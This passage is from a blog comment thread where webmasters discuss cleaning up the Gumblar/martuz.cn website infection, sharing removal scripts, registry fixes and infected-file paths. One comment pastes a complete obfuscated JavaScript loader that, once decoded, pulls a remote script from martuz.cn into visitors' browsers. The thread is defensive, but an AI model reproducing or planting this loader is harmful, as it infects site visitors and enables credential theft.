      If this is what was embedded and nothing else, this line of code is harmless…

      are you sure this is it? because it doesn’t seem like the gumblar virus…

      • |

        It’s had some of the code removed due to the posting restrictions on this site. That code is a trimmed down version of the “cookie check” method for the Gumblar virus. It tries to ensure that it only infects each user a single time through each domain, so it’s not easy to trace where the infection came from. The first time it infects the computer, it loads a customized URL from Gumblar.cn then sets a cookie (based on the specific site and variant of the infection), that identifies whether the user has had the script injected for them. If it has been, the user won’t see it ON THAT SITE again. At least not from the same variant. If their site is re-infected again later, a new variant with a new cookie will be loaded.

  20. |

    We were infected by this and managed to eventually get rid of it.

    Initially we just tried getting rid of the bad code but every time we did it just re appeared again.

    We finally got rid of it by deleting everything off our server and reinstalling phpbb3 with a backup of the forum. The forum is our main site so that was the priority, but we lost our TV streaming site; we decided it was best as it used RSS feeds, which seems the top suspect in how they were getting in. The only other way was them somehow getting our FTP or server password, which seemed unlikely as nothing else was affected.

    You can follow our progress and how we found and finally dealt with it at the thread on the link below, all the best to everyone fighting and looking into this pest.

    http://www.havenvideo.com/viewtopic.php?f=2&t=35832

  21. |

    I found a gifimg.php file within all directories named “images”. Took me forever to clean everything up.

  22. |

    This actually started to become an aggressive script injection since Conficker was released. It’s imperative that a PC is clean prior to changing any ftp or cpanel passwords. If the pc is not scanned or cleaned up any changes to the password are moot since the infection somehow manages to steal login information.

    I remove these injections on a daily basis and have a script that can do it with relative ease.

  23. |

    [...] hope that no one else’s website has been hit with the gumblar-cn-exploit parasite. I have, and it has not been any fun getting rid of it. Actually, at one point, I thought [...]

  24. |

    Like I’ve posted in several comments above – removing the infection within the files on your server is going to be only a small part of the actual removal.

    The virus that has infected someone with FTP access to those sites is what is ultimately responsible for compromising the sites. The user should have issues opening a command prompt and regedit, and may have issues downloading updates to security software (like Malware Bytes, AVG and others). They should also have issues patching Adobe Reader & Acrobat and any other Adobe products.

    The actual infection uses a malformed PDF file to drop an infection into the Windows folder. On the client computer I recently cleaned it was named “qvs.ste” and was located at:
    c:\windows\qvs.ste

    However, the file is in use and cannot be removed directly. Further, it tags itself in the startup so it will automatically load as a driver, here:
    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]

    Something interesting was that the path to the file within the registry value includes “\..\”, which should make it really easy to find (it was the only instance of that string on the infected computer, though some HP AIO drivers include similar tags throughout the registry on other machines). The following registry file would remove it:

    =========================
    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
    ; REGEDIT4 deletes a value with "name"=- (the posted line used curly quotes and a leading "-")
    ; the value being removed pointed at "C:\\WINDOWS\\system32\\..\\qvs.ste"
    "aux2"=-
    =========================

    I personally used LogMeIn to access the computer and then used Killbox (http://www.killbox.net/) to remove it (use “replace on reboot” and make sure “end explorer” is selected) to remove the actual infection.

    Good luck to everyone who is still dealing with this darn thing.

  25. |

    Howdy…
    I had this nasty guy on my site. I downloaded my entire site to a separate hard drive, then ran avast through the files. I found the infected code (posted below) and removed from each file from my C Panel, changed all PW’s. This was a tough ball to break indeed!
    Good luck!

  26. |

    I have found the following code inserted to all html and htm files on my website. All code injections happen between the section of each file

    Google is reporting that the website is hosting malware, and that it links back to martuz.cn

    Would I be safe if I run that Gumblar removal script posted above? I don’t want to do it if I’m going to lose any data..

    thanks

    Richie

    • |

      Arg, it removed the code.. moderator, please post this

      (function(){var VCYSq=’var@20a@3d@22Scrip@74En@67in@65@22@2c@62@3d@22Version(@29+@22@2cj@3d@22@22@2cu@3dnavig@61tor@2e@75s@65rA@67@65@6e@74@3b@69f@28(u@2e@69@6edexOf@28@22Chrome@22)@3c0)@26@26(u@2einde@78O@66@28@22W@69n@22@29@3e@30@29@26@26(u@2eindexO@66(@22NT@20@36@22)@3c0)@26@26(@64o@63ument@2ec@6fokie@2eindexOf(@22miek@3d1@22)@3c@30)@26@26(@74@79p@65of@28zrv@7ats)@21@3dty@70@65@6ff(@22A@22)))@7bzr@76zts@3d@22@41@22@3bev@61l(@22if(win@64o@77@2e@22+a+@22)j@3dj+@22+a@2b@22@4dajo@72@22+@62@2ba@2b@22Minor@22+b@2b@61@2b@22@42uild@22+b@2b@22j@3b@22)@3b@64@6f@63u@6den@74@2ewri@74e(@22@3cscript@20s@72c@3d@2f@2fma@22+@22@72tu@7a@2e@63n@2fv@69d@2f@3fid@3d@22+j+@22@3e@3c@5c@2fscr@69pt@3e@22)@3b@7d’;var tKmp=VCYSq.replace(/@/g,’%');var c85=unescape(tKmp);eval(c85)})();

      There were comments right before the function call and after the ;

      • |

        The removal script I posted will not do anything on your virus code. And what you posted probably is not the actual code, as there are posting restrictions on this blog.

        Put your code in a txt file, zip it, and store it somewhere on the internet.

        Post the zip file’s URL here or send it to me (info@axxis.gr) to check it and include in the removal script.

  27. |

    I created a script yesterday for automatically removing the trojan from a website, and posted it on my blog. (Since I disinfected my site last night, it may still be reported as an attack site, but I requested a review by Google, so that should be done tomorrow – ignore the warning.)
    http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarmartuz-trojan/

    • |

      Thanks, this worked great for cleaning my websites.

      For my infected PC, I used both Malwarebytes and ComboFix. Changed my passwords, updated Adobe Flash Player and updated Adobe Reader to 9.1, disabled Adobe JavaScript and changed my FTP passwords. Hopefully, I covered everything and it won’t come back.

      Is there anything else I should do? I only run AVG firewall, do I need something else/better?

  28. |

    I see all kinds of suggestions, most seem to be really time-consuming, but what I did took me less than an hour.

    I ran Malwarebyte’s Antimalware on my PC, cleaned the virus, reset my passwords, updated Acrobat reader.

    Then I went on my site, ran my removal script.

    It’s been 4 days now, and this thing didn’t come back.

  29. |

    This information is really very useful.
    In the last month I removed the virus from at least 25 sites.

  30. |

    Here’s my vaccine against the Gumblar worm. Hope this helps.
    http://zzz.rezo.net/Security-beware-of-the-Gumblar.html

  31. |

    I ran Malwarebytes’ Anti-Malware on my PC, cleaned the virus, then cleaned the web page and changed website passwords, then sent a review request to Google; after 6 hours Google removed the malware notification from my index web page in the search engine.
    But
    yesterday I received an email from Google that my subdomain is infected.

    My question:
    where on my PC is this malware going?
    My PC gets infected rapidly.

  32. |

    [...] Gumblar trojan : Gumblar explode across the Web Beware of the Gumblar Worm PHP exploit on the loose 12 Facts about the Gumblar Exploit Removal and Prevention of [...]

  33. |

    [...] but these modifications have common parts that can be identified as the gumblar . cn script. Read this post for more information on Gumblar symptoms. You may also want to check your website using this [...]

  34. |

    [...] http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  35. |

    [...] own site saved on your computer, then those logins and passwords may have been compromised. The virus we suspect to be the culprit steals these passwords, logs into your FTP account, and then proceeds to alter or upload files. It [...]

  36. |

    [...] This blog post give some facts on the exploit which I used to help with the removal. [...]

  37. |

    We ended up buying a tool called HyperXR. It was not cheap or free but fixed our problem on the server files. php files which get run on server with files with bad code.

  38. |

    Google has finally weighed in:
    http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

  39. |

    Why don’t you just replace the “eval” with “alert” and have a look at the de-obfuscated code? worked perfectly for me (NoScript is my friend^^)

  40. |

    [...] See this for more information: Gumblar .cn Exploit – 12 Facts About This Injected Script | Unmask Parasites. Blog. [...]

  41. |

    [...] list. Their figures counted 60,000 sites infected with its payload which according to this account injects malicious Javascript code into every HTML file it can find. Meanwhile, Goooogleadsence.biz [...]

  42. |

    [...] monitoring organisations reported widespread compromises pointing to the domains gumblar.cn and martuz.cn, both of which [...]

  43. |

    I think I found the source of the virus,
    thanks to ZoneAlarm.

    delete these files:

    C:\WINDOWS\system32\wbem\proquota.exe
    C:\WINDOWS\system32\wbem\grpconv.exe

    I hope this helps us; I spent several months fighting with this damn virus.

  44. |

    [...] Gumblar .cn Exploit – 12 Facts About This Injected Script [...]

  45. |

    [...] Gumblar .cn Exploit – 12 Facts About This Injected Script [...]

  46. |

    [...] Is There A New Virus Threat? Here’s some information on Gumblar: Gumblar .cn Exploit – 12 Facts About This Injected Script | Unmask Parasites. Blog. Gumblar Exploit ScanSafe STAT Blog – ScanSafe STAT Blog – GumblarQ&A It could also be the [...]

  47. |

    [...] Windows Server 2003 References ScanSafe: http://blog.scansafe.com/ Unmask Parasites Blog: http://blog.unmaskparasites.com/2009…jected-script/ Switched: http://www.switched.com/2009/06/18/h…or-web-threat/ Beladen: a server-level exploit. [...]

  48. |

    [...] … </SCRIPT> with the malicious code from all your .htm, .php, .asp, etc. files. Here are instructions on how to identify it specifically (in English), although any webmaster with [...]

  49. |

    I first downloaded the public_html folder of my site, and then scanned the folder using AVG. AVG gave me the location of all of the infected files.

    I then used my Cpanel (on a Linux server) file editor to take out the malicious code to avoid opening any files within my own windows machine.

    I also noticed that the virus seems to go for main pages such as any index.php files as well as main.php plus the config.php file in all sites.

  50. |

    [...] as potentially dangerous. R Web Security › Add New Post — WordPress Other malware researchers reported widespread compromises pointing to the domains gumblar.cn and martuz.cn, both of which made it on [...]